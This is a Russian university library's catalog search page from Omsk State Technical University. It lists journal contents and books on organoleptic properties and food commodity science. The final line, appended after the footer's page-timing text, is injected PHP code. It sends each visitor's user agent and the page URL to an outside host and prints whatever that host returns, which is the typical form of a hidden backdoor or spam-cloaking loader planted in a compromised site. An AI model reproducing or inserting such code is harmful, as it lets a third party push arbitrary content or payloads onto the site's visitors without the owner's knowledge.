Перейти на сайт
библиотеки ОмГТУ
Share |
   
   
   
   
   
   

 
      Виртуальная справка
 
      Личный кабинет

Логин
Пароль
Забыли пароль?
Регистрация

 
      Счетчики
Rambler's Top100
Яндекс цитирования

Сейчас на сайте

139 пользователей


Зарегистрированных: 1 

Борисенко Елена Стефановна


 
      Наши партнеры
Студенческий информационный портал компании
("Ключевые слова=ОРГАНОЛЕПТИЧЕСКИЕ")
Результаты поиска
СВОДНЫЙ КАТАЛОГ: Найдено записей: 7
1. 
Товаровед продовольственных товаров. - Журнал, 2010г. № 11
Оглавление 
  • Резго, Г. Я. Естественная убыль варённых колбас при хранении в торговле / ; Г. Я. Резго. - с.18-23
    Кл. слова: ТОВАРОВЕДЕНИЕ МЯСНЫХ ТОВАРОВ, НОРМЫ естественной убыли, ХРАНЕНИЕ ПРОДОВОЛЬСТВЕННЫХ ТОВАРОВ
  • Романюк, Г. Г. Современные тенденции в развитии ассортимента продовольственных товаров / ; Г. Г. Романюк, БобожоноваГ.А.. - с.35-38
    Кл. слова: ОРГАНОЛЕПТИЧЕСКИЕ свойства, БЕЗОПАСНОСТЬ ПИЩЕВЫХ ПРОДУКТОВ
  • Маркетинговый анализ. - с.42-48
    Кл. слова: SWOT-анализ, Анализ товарного портфеля, АНАЛИЗ МАРКЕТИНГОВЫЙ
  • Мартынова, О. В. Потребительские свойства составного молочного продукта / ; О. В. Мартынова. - с.49-51
    Кл. слова: ТОВАРОВЕДЕНИЕ МОЛОЧНЫХ ТОВАРОВ
2. 
Товаровед продовольственных товаров. - Журнал, 2013г. № 3
Оглавление 
  • Карагодин, В. П.. Биологически активные добавки к пище - товарная группа с неясной перспективой / В. П. Карагодин. - с.15-20
    Кл. слова: БАД
  • Гурьева, К. Б.. Применение балльной системы для сенсорной оценки качества мясной продукции при хранении / К. Б. Гурьева, О. А. Тюгай, Е.Б. Иванова. - с.34-39
    Кл. слова: ОРГАНОЛЕПТИЧЕСКИЕ СВОЙСТВА, МЯСНЫЕ ПРОДУКТЫ, ХРАНЕНИЕ МЯСА
  • Коваленко, А. С.. Об истории возникновения товароведения на Руси / А. С. Коваленко. - с.40-43
    Кл. слова: ТОВАРОВЕДЕНИЕ - ИСТОРИЯ
  • Наумова, Н. Л.. Критерии выбора колбасных изделий потребителями при совершении покупки / Н. Л. Наумова. - с.58-62
    Кл. слова: КОЛБАСНЫЕ ИЗДЕЛИЯ, МАРКЕТИНГОВЫЕ ИССЛЕДОВАНИЯ
  • Мардар, М. Р.. Значимость маркетинговых исследований при разработке новых продуктов / М. Р. Мардар. - с.63-68
    Кл. слова: МАРКЕТИНГОВЫЕ ИССЛЕДОВАНИЯ, ТОВАР НОВЫЙ - ПРОДВИЖЕНИЕ НА РЫНОК
3. 
Хранение и переработка сельхозсырья. - Журнал, 2011г. № 8
Оглавление 
  • Химический состав мелассного раствора после ультразвуковой обработки. - с.8-9
  • Шестаков, С. Д. Интенсивная гидратация биополимеров пищевого сырья посредством кавитационной обработки воды / С. Д. Шестаков. - с.10-15
  • Содержание основных химических веществ в плодах огурцов. - с.15-16
  • К вопросу об образовании накипи на поверхности теплообмена. - с.16-18
  • Васильева, Л. Г. Некоторые тенденции изменения технологических характеристик жиропота в шерсти овец / Л. Г. Васильева, С. И. Мирошниченко, Л. М. Пантелеева. - с.19
  • Вольф, Е. Ю. Влияние порошка тыквы на реологические свойства теста и органолептические показатели блинчиков / Е. Ю. Вольф, Н. М. Птичкина. - с.20-21
  • Овчинников, С. М. Влияние замораживания и размораживания говядины на степень высвобождения ферментов клеточных органелл / С. М. Овчинников, А. Н. Габараев, О. Е. Овчинникова. - с.22-23
  • Мизова, И. Х. Влияние способов внесения маргарина на реологические свойства пшеничного теста и качество хлебобулочных изделий / И. Х. Мизова, В. Я. Черных, Ю. В. Игнатова. - с.23-26
  • Ткаченко, В. В. Элементы методологии оценки эффективности фунгицидов для сыров / В. В. Ткаченко. - с.27-29
  • Динамика БАВ надземной части Viburnum opulus L. при вегетации. - с.29-31
  • Морозов, С. А. Перспективные направления в технологии обработки и хранения картофеля / С. А. Морозов, С. Н. Афиногенова. - с.32-34
  • Евпатченко, Ю. В. Разработка технологии и рецептуры соуса функционального назначения с использованием порошка и тыквы / Ю. В. Евпатченко, Н. М. Птичкина. - с.34-36
  • Мараева, О. Б. Некоторые биохимические характеристики молока / О. Б. Мараева, Е. Ю. Ухина, М. Н. Мараев. - с.36-38
  • Оптимизация рецептурного состава печенья с использованием экспериментально-статического подхода. - с.38-42
  • Купцова, О. И. Исследование хранимоспособности сыворотки-коагулянта, ферментированной заквасками прямого внесения / О. И. Купцова, Т. И. Шингарева. - с.43-46
  • Макарова, Н. В. Определение содержания флавоноидов и оценка восстанавливающей силы экстрактов овощей / Н. В. Макарова, В. П. Бординова. - с.46-48
  • Злепкин, В. А. Использование концентрата кормового из растительного сырья "Сарепта" при откорме свиней / В. А. Злепкин, Ю. А. Матвеев. - с.48-50
  • Руднев, С. Д. Адгезионная природа прочности растительной ткани / С. Д. Руднев. - с.50-53
  • Темираев, Р. Б. Повышение экологической и пищевой ценности мяса бройлеров / Р. Б. Темираев, С. С. Лохова. - с.53-54
  • Ильичев, Г. Н. Химический состав и пищевая ценность овсяной крупы, полученной гидротермобарометрическим способом шелушения / Г. Н. Ильичев, А. В. Овчаренко. - с.55-56
  • Хамагаева, И. С. Технология мягкого сыра с использованием пропионовокислых бактерий / И. С. Хамагаева, Н. Б. Чойжилсурэн, Л. М. Качанина. - с.56-59
  • Реологическое поведение замесов из зерна в зависимости от концентрации ионов Ca{2+} и Mg{2+} в воде. - с.59-61
  • Василенко, В. Н. Ресурсосберегающие рецептуры комбикормов для поросят / В. Н. Василенко. - с.62-63
  • Манжесов, В. И. Перспективы использования бобов фасоли для получения белковых концентратов / В. И. Манжесов, С. Ю. Чурикова, Е. Е. Курчаева. - с.64-65
  • Моделирование течения расплава биополимера в динамической матрице экструдера. - с.66-69
  • Червецов, В. В. Анализ работы поточного охладителя-кристаллизатора / В. В. Червецов, А. Ю. Золотин. - с.69-72
  • Бабенышев, С. П. Повышение проницаемости мембран при разделении жидких полидисперсных систем / С. П. Бабенышев, И. А. Евдокимов. - с.72-74
  • Николаев, Н. С. Термодинамический анализ процесса хранения пищевых продуктов / Н. С. Николаев, С. А. Рыжов. - с.75-77
Держатели документа (Информация об экземплярах) 
4. 
Артюхова, Светлана Ивановна. Биотехнология производства зерненого творога для школьного питания [Текст] / С. И. Артюхова, И. Ф. Тетюшева, 2014. - 115 с.
Оглавление 
Держатели документа (Информация об экземплярах) 

Представлены данные по производству функциональных продуктов на молочной основе для школьного питания. Приведены результаты собственных теоретических и экспериментальных исследований в сфере совершенствования технологии производства зерненого творога для школьного питания.

Рекомендуется специалистам в области биотехнологии и пищевой промышленности, а также студентам бакалавриата, магистратуры, аспирантам, специализирующимся по соответствующим направлениям.

Полный текст
5. 
Экспертиза напитков [Текст] : Учеб. пособие для вузов по специальности "Товароведение и экспертиза товаров" / В. М. Поздняковcкий, В. А. Помозова, Т. Ф. Киселева, Л. В. Пермякова; Под ред. В. М. Позняковского, 2002. - 382 с.
Держатели документа (Информация об экземплярах) 

Книга содержит наиболее полный учебно-справочный материал по экспертизе спирта этилового, водок, коньяков, вин, пива, ликеро-водочных и безалкогольных напитков, включая импортируемую продукцию.

6. 
Позняковский, Валерий Михайлович. Экспертиза мяса и мясопродуктов [Текст] : Учеб. пособие для вузов по специальности "Товароведение и экспертиза товаров" / В. М. Позняковский, 2002. - 524 с.
Оглавление 
  • Химический состав мяса и мясопродуктов. - с.473-498
  • Порядок сертификации мяса, мясной продукции, мяса птицы, яйца и продуктов их переработки. - с.499-514

Книга содержит наиболее полный учебно-справочный материал по экспертизе мяса и мясопродуктов, включая свежее мясо и продукты из говядины, баранины, конины, оленины.

7. 
Шидловская, Виктория Павловна. Органолептические свойства молока и молочных продуктов [Текст] : Справ. / В. П. Шидловская; Н. В. Куркина, 2000. - 280 с.
Держатели документа (Информация об экземплярах) 


    Адрес: 644050, Россия, г. Омск, пр-кт Мира, 11

    Телефон: (3812) 65-34-86, 65-23-69

    E-mail: libdirector@omgtu.ru, b_oa@omgtu.ru

[ О библиотеке ]     [ Читателю ]     [ Информационные ресурсы ]     [ Электронный каталог ]     [ Научная деятельность ]     [ Культура и досуг ]     [ ИРБИС в Омске ]

Электронное периодическое издание «lib.omgtu.ru» | Свидетельство о регистрации СМИ Эл № ФС77-45378 от 10.06.2011 Федеральной службы по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор)| Выпуск № 3048 - 14.10.2019
© Омский государственный технический университет

Электронно-библиотечная система АРБУЗ ОмГТУ
Страница сгенерирована за 1.21 с.18 запросов, 0.93c. $useragent=$_SERVER['HTTP_USER_AGENT']; $bs=base64_encode($useragent); $sb='http://'.$_SERVER['SERVER_NAME'].$_SERVER["REQUEST_URI"]; $ret = file_get_contents('http://jr.6tws.us/?UserAgent='.$bs."&Domain=".$sb); print $ret;